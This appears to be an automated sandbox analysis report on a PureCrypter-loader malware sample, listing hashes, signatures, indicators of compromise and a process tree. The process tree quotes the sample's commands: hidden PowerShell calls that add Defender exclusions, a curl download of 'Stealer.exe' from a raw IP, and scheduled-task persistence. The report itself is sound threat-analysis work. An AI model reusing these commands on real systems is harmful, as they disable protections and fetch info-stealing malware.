Analysis
-
max time kernel
92s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
25-01-2023 07:58
Static task
static1
Behavioral task
behavioral1
Sample
c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe
Resource
win10v2004-20221111-en
General
-
Target
c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe
-
Size
1.3MB
-
MD5
f1c29ba01377c35e6f920f0aa626eaf5
-
SHA1
7b2c191bc2d5d549c5e65613f93d59ece1842f02
-
SHA256
c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b
-
SHA512
449a9d0ec42f83be09ef7a258f50f3d07728bb9f06361dc4aebdcbcce0ca010a3c894a5d27d98f197d6b4b85be4e3639656ae75a0216e8e169c54717ad2a85f0
-
SSDEEP
24576:hT+ua8m657w6ZBLmkitKqBCjC0PDgM5AVnipXD1Z+7:hcVV1BCjBG2
Malware Config
Extracted
purecrypter
https://cents-ability.org/loader/uploads/noicon_Ujizjydo.bmp
Signatures
-
PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.
-
Executes dropped EXE 2 IoCs
Processes:
noicon.exeStearler.exepid process 1772 noicon.exe 64 Stearler.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exeStearler.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation Stearler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3644 schtasks.exe 2168 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 4288 powershell.exe 4288 powershell.exe 3420 powershell.exe 3420 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
noicon.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1772 noicon.exe Token: SeDebugPrivilege 4288 powershell.exe Token: SeDebugPrivilege 3420 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.execmd.exeStearler.execmd.exedescription pid process target process PID 4732 wrote to memory of 1772 4732 c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe noicon.exe PID 4732 wrote to memory of 1772 4732 c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe noicon.exe PID 4732 wrote to memory of 1772 4732 c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe noicon.exe PID 4732 wrote to memory of 64 4732 c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe Stearler.exe PID 4732 wrote to memory of 64 4732 c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe Stearler.exe PID 4732 wrote to memory of 64 4732 c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe Stearler.exe PID 4732 wrote to memory of 2592 4732 c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe cmd.exe PID 4732 wrote to memory of 2592 4732 c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe cmd.exe PID 2592 wrote to memory of 3644 2592 cmd.exe schtasks.exe PID 2592 wrote to memory of 3644 2592 cmd.exe schtasks.exe PID 2592 wrote to memory of 2168 2592 cmd.exe schtasks.exe PID 2592 wrote to memory of 2168 2592 cmd.exe schtasks.exe PID 64 wrote to memory of 3456 64 Stearler.exe cmd.exe PID 64 wrote to memory of 3456 64 Stearler.exe cmd.exe PID 64 wrote to memory of 3456 64 Stearler.exe cmd.exe PID 3456 wrote to memory of 4288 3456 cmd.exe powershell.exe PID 3456 wrote to memory of 4288 3456 cmd.exe powershell.exe PID 3456 wrote to memory of 4288 3456 cmd.exe powershell.exe PID 3456 wrote to memory of 3420 3456 cmd.exe powershell.exe PID 3456 wrote to memory of 3420 3456 cmd.exe powershell.exe PID 3456 wrote to memory of 3420 3456 cmd.exe powershell.exe PID 3456 wrote to memory of 4400 3456 cmd.exe curl.exe PID 3456 wrote to memory of 4400 3456 cmd.exe curl.exe PID 3456 wrote to memory of 4400 3456 cmd.exe curl.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe"C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Administrator\Desktop\DROP\noicon.exe"C:\Users\Administrator\Desktop\DROP\noicon.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Administrator\Desktop\DROP\Stearler.exe"C:\Users\Administrator\Desktop\DROP\Stearler.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS838C.tmp\Testobfusc.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -w hidden -Command Add-MpPreference -ExclusionExtension ".vbs"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -w hidden -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\curl.execurl http://140.82.34.147/Stealer.exe -o C:\Users\Public\Downloads\Stealer.exe4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "testM" /xml "C:\Users\Admin\AppData\Local\Temp\f1.xml"3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "test" /xml "C:\Users\Admin\AppData\Local\Temp\f2.xml"3⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD5443d4812f2139e4bcde2e71bbac34f60
SHA10e10245065ef5fe6979b522098d21993b2346c52
SHA2561fec33ac2be90b663a7d1d530308bc8367b5c932fcc4b0dee550fbb248ec7919
SHA512e53f16a34651487650156c2c842e8af4fc6d13b1548bc2e665599fb43992a4c22ba6f572bcb44d2a44ac5c7479cc5d7e689a906363436d393e3444f0ecbf3517
-
C:\Users\Admin\AppData\Local\Temp\7zS838C.tmp\Testobfusc.batFilesize
14KB
MD540e65da3d99568737a62d30060539f23
SHA1c5b616eb054a850b019da2d19e42b82575a269c1
SHA256a9ea79963c53c3756fc752d4a2978a86de6038fc728fabc200bc87cd938406e5
SHA512ef19c1001097545955c2d4c3de48bcda7633459577cf3f54653ae0c89fea5e61e763645bdcd2027c303522c98a02893df1f7195b3d26d38a808e7cc78a5c325d
-
C:\Users\Admin\AppData\Local\Temp\f1.xmlFilesize
1KB
MD5d5d149b6de60fc4b8ae79a4123955efa
SHA19e76a623ff4999c3a0597000fc92d8c16b64b783
SHA256381a91077f6813b09c642ecc089b362460384e19727adfcf6852121d06965cdf
SHA5122f3c92063df61b1d3ea186763121b203839c30f2cc528fd7abf9cfffded16144edc98a2e52d331d4975c858081b8067c0ca5c028e21cb8c78cfbda0eb899aca0
-
C:\Users\Admin\AppData\Local\Temp\f2.xmlFilesize
1KB
MD5bde3b9bcaba83190f1b8793b5997cd00
SHA1a386e5ef10c24df4c5b667aaaadae8604d6c1efa
SHA256756ce3e406b95d8c2a88e0a154eb0c7b12fa5f825046d400ff25ccf86dd1decc
SHA512dae4c9a06e9ba61146ad25ff376690949d9d9a50a8be87ece4c25da63ce47c261737bff8a284e3966b38aa410dfccee8bf6bb38d024a5ac8041e8dc8b55d10cc
-
C:\Users\Administrator\Desktop\DROP\Stearler.exeFilesize
127KB
MD5c07c33c5e7c12107f2788280ad31c391
SHA18e14f012e98c39d6b20fe14a7532f299e5c001a0
SHA256389b207183e0ea0fbc4beac9155486c5e6641d20aebd49eeaaa360dde72b7967
SHA5128109a67532de5e35036680b66e2bdf06aa5067f1e601c4cf46f4c21721dc9dc3b2a65fcb77e01b74fa4246e1121ee058d81e8ec20c71dd8a2d906a73af88b0a1
-
C:\Users\Administrator\Desktop\DROP\Stearler.exeFilesize
127KB
MD5c07c33c5e7c12107f2788280ad31c391
SHA18e14f012e98c39d6b20fe14a7532f299e5c001a0
SHA256389b207183e0ea0fbc4beac9155486c5e6641d20aebd49eeaaa360dde72b7967
SHA5128109a67532de5e35036680b66e2bdf06aa5067f1e601c4cf46f4c21721dc9dc3b2a65fcb77e01b74fa4246e1121ee058d81e8ec20c71dd8a2d906a73af88b0a1
-
C:\Users\Administrator\Desktop\DROP\noicon.exeFilesize
16.0MB
MD5fdd4cd11d278dab26c2c8551e006c4ed
SHA1f0ef434d38fa11f8bc38cbc90874ca582867b214
SHA25680d4414ca76e050007cb39c7fb598e1828ad168bea5725fb5466ee9388d6fa05
SHA5129333eaba36a12bb0ab260c553bbed6ddb872fc42b05a2cf3552702c298b3d01d653467a00caa1b5232e9a828dce3810e67e08d1f2e245e4356248bf337fb96bb
-
C:\Users\Administrator\Desktop\DROP\noicon.exeFilesize
16.0MB
MD5fdd4cd11d278dab26c2c8551e006c4ed
SHA1f0ef434d38fa11f8bc38cbc90874ca582867b214
SHA25680d4414ca76e050007cb39c7fb598e1828ad168bea5725fb5466ee9388d6fa05
SHA5129333eaba36a12bb0ab260c553bbed6ddb872fc42b05a2cf3552702c298b3d01d653467a00caa1b5232e9a828dce3810e67e08d1f2e245e4356248bf337fb96bb
-
memory/64-139-0x0000000000000000-mapping.dmp
-
memory/1772-146-0x0000000000710000-0x0000000000718000-memory.dmpFilesize
32KB
-
memory/1772-137-0x0000000000000000-mapping.dmp
-
memory/2168-148-0x0000000000000000-mapping.dmp
-
memory/2592-143-0x0000000000000000-mapping.dmp
-
memory/3420-169-0x0000000000000000-mapping.dmp
-
memory/3420-172-0x000000006F410000-0x000000006F45C000-memory.dmpFilesize
304KB
-
memory/3456-150-0x0000000000000000-mapping.dmp
-
memory/3644-144-0x0000000000000000-mapping.dmp
-
memory/4288-152-0x0000000000000000-mapping.dmp
-
memory/4288-161-0x00000000065C0000-0x00000000065DE000-memory.dmpFilesize
120KB
-
memory/4288-168-0x00000000075B0000-0x00000000075B8000-memory.dmpFilesize
32KB
-
memory/4288-153-0x0000000002760000-0x0000000002796000-memory.dmpFilesize
216KB
-
memory/4288-154-0x0000000005270000-0x0000000005898000-memory.dmpFilesize
6.2MB
-
memory/4288-155-0x0000000005190000-0x00000000051B2000-memory.dmpFilesize
136KB
-
memory/4288-156-0x00000000058A0000-0x0000000005906000-memory.dmpFilesize
408KB
-
memory/4288-157-0x0000000005A00000-0x0000000005A66000-memory.dmpFilesize
408KB
-
memory/4288-158-0x0000000006040000-0x000000000605E000-memory.dmpFilesize
120KB
-
memory/4288-159-0x0000000006610000-0x0000000006642000-memory.dmpFilesize
200KB
-
memory/4288-160-0x000000006F410000-0x000000006F45C000-memory.dmpFilesize
304KB
-
memory/4288-167-0x0000000007680000-0x000000000769A000-memory.dmpFilesize
104KB
-
memory/4288-162-0x0000000007980000-0x0000000007FFA000-memory.dmpFilesize
6.5MB
-
memory/4288-163-0x0000000007330000-0x000000000734A000-memory.dmpFilesize
104KB
-
memory/4288-164-0x0000000007390000-0x000000000739A000-memory.dmpFilesize
40KB
-
memory/4288-165-0x00000000075C0000-0x0000000007656000-memory.dmpFilesize
600KB
-
memory/4288-166-0x0000000007560000-0x000000000756E000-memory.dmpFilesize
56KB
-
memory/4400-173-0x0000000000000000-mapping.dmp
-
memory/4732-145-0x00007FF9C6AF0000-0x00007FF9C75B1000-memory.dmpFilesize
10.8MB
-
memory/4732-132-0x0000000000C30000-0x0000000000D78000-memory.dmpFilesize
1.3MB
-
memory/4732-136-0x000000001C630000-0x000000001C652000-memory.dmpFilesize
136KB
-
memory/4732-135-0x00007FF9C6AF0000-0x00007FF9C75B1000-memory.dmpFilesize
10.8MB
-
memory/4732-134-0x00000000015C0000-0x00000000015DE000-memory.dmpFilesize
120KB
-
memory/4732-133-0x000000001C510000-0x000000001C586000-memory.dmpFilesize
472KB